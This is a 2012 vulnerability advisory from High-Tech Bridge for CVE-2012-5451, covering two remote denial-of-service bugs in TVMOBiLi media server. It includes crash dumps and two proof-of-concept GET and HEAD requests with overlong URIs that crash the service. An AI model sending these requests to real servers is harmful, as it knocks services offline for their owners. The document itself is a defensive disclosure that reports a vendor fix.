TVMOBiLi Media Server 2.1.0.3557 Denial Of Service

`Advisory ID: HTB23120  
Product: TVMOBiLi media server  
Vendor: TVMOBiLi  
Vulnerable Version(s): 2.1.0.3557 and probably prior version  
Tested Version: 2.1.0.3557 in Windows XP SP3 32 bits  
Vendor Notification: October 15, 2012   
Vendor Patch: November 21, 2012   
Public Disclosure: December 5, 2012   
Vulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130]  
CVE Reference: CVE-2012-5451  
CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)  
Solution Status: Fixed by Vendor  
Risk Level: Medium   
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )   
  
-----------------------------------------------------------------------------------------------  
  
Advisory Details:  
  
High-Tech Bridge Security Research Lab has discovered 2 remote DoS vulnerabilities in TVMOBiLi Media server, which could be exploited to crash remote server with malicious HTTP requests.  
  
1) Improper Handling of Length Parameter Inconsistency in TVMOBiLi: CVE-2012-5451  
  
1.1 The vulnerability exists due to improper handling of URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP GET request of 161, 257 or 255 characters long to 30888/TCP port (default TVMOBiLi's server port) and cause a stack-based buffer overrun that will crash tvMobiliService service.  
  
Crash details  
  
  
MSVCR100.dll:78abe2ad mov [edx], al from thread 1860 caused access violation when attempting to write to 0x0170e000  
CONTEXT DUMP  
EIP: 78abe2ad mov [edx],al  
EAX: 00b8fd3e ( 12123454) -> injected stream (stack)  
EBX: 00000019 ( 25) -> N/A  
ECX: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp N/A  
EDI: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp sx xx'(x(x0kxxT$|$| (stack)  
EBP: 00b8f61c ( 12121628) -> sx xx'(x(x0kxxT$|$| (stack)  
ESP: 00b8f60c ( 12121612) -> xnx|8xx|8xp+| ==sx xx' (stack)  
+00: 78abe2ff (2024530687) -> N/A  
+04: 00000000 ( 0) -> N/A  
+08: 0000011f ( 287) -> N/A  
+0c: 00000002 ( 2) -> N/A  
+10: 00b8f8ac ( 12122284) -> Aax$=pppB;p$= @==ypp N/A  
  
disasm around:  
0x78abe28e jnc 0x78abe2f9  
0x78abe290 outsb  
0x78abe292 and fs:[eax],al  
0x78abe296 test byte [ecx+0xc],0x40  
  
  
  
Proof of Concept  
The following HTTP GET request will crash vulnerable tvMobiliService service remotely:  
  
  
GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1  
HOST: 192.168.10.12:30888  
Referer: 192.168.10.12:30888  
ACCEPT: */*  
Accept-Encoding: None  
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)  
Connection: Close  
Accept-Transfer-Encoding: None  
  
  
  
1.2 The vulnerability exists due to improper handling of URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of 255, 257 or 260 characters long to 30888/TCP port and cause a stack-based buffer overrun that will crash tvMobiliService service.  
  
Crash details  
  
MSVCR100.dll:78abe2ad mov [edx], al from thread 1745 caused access violation when attempting to write to 0x0170e000  
  
CONTEXT DUMP  
EIP: 78abe2ad mov [edx],al  
EAX: 00b8fd3e ( 12123454) -> injected stream (stack)  
EBX: 00000019 ( 25) -> N/A  
ECX: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp N/A  
EDI: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp sx xx'(x(x0kxxT$|$| (stack)  
EBP: 00b8f61c ( 12121628) -> sx xx'(x(x0kxxT$|$| (stack)  
ESP: 00b8f60c ( 12121612) -> xnx|8xx|8xp+| ==sx xx' (stack)  
+00: 78abe2ff (2024530687) -> N/A  
+04: 00000000 ( 0) -> N/A  
+08: 0000011f ( 287) -> N/A  
+0c: 00000002 ( 2) -> N/A  
+10: 00b8f8ac ( 12122284) -> Aax$=pppB;p$= @==ypp N/A  
  
disasm around:  
0x78abe28e jnc 0x78abe2f9  
0x78abe290 outsb  
0x78abe292 and fs:[eax],al  
0x78abe296 test byte [ecx+0xc],0x40  
  
  
  
Proof of Concept  
The following HTTP HEAD request will crash vulnerable tvMobiliService service remotely:  
  
  
HEAD /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1  
HOST: 192.168.10.12:30888  
Referer: 192.168.10.12:30888  
ACCEPT: */*  
Accept-Encoding: None  
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)  
Connection: Close  
Accept-Transfer-Encoding: None  
  
  
  
  
-----------------------------------------------------------------------------------------------  
  
Solution:  
  
Upgrade to TVMOBiLi 2.1.0.3974  
  
More Information:  
http://forum.tvmobili.com/viewtopic.php?f=7&t=55117  
http://dev.tvmobili.com/changelog.php  
  
-----------------------------------------------------------------------------------------------  
  
References:  
  
[1] High-Tech Bridge Advisory HTB23120 - https://www.htbridge.com/advisory/HTB23120 - TvMobili Media Server Multiple Remote DoS Vulnerabilities.  
[2] TVMOBiLi LTD - http://www.tvmobili.com - TVMOBiLi is a free Media server for Mac, Windows, and Linux Operating Systems.  
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.  
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.   
  
-----------------------------------------------------------------------------------------------  
  
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.  
`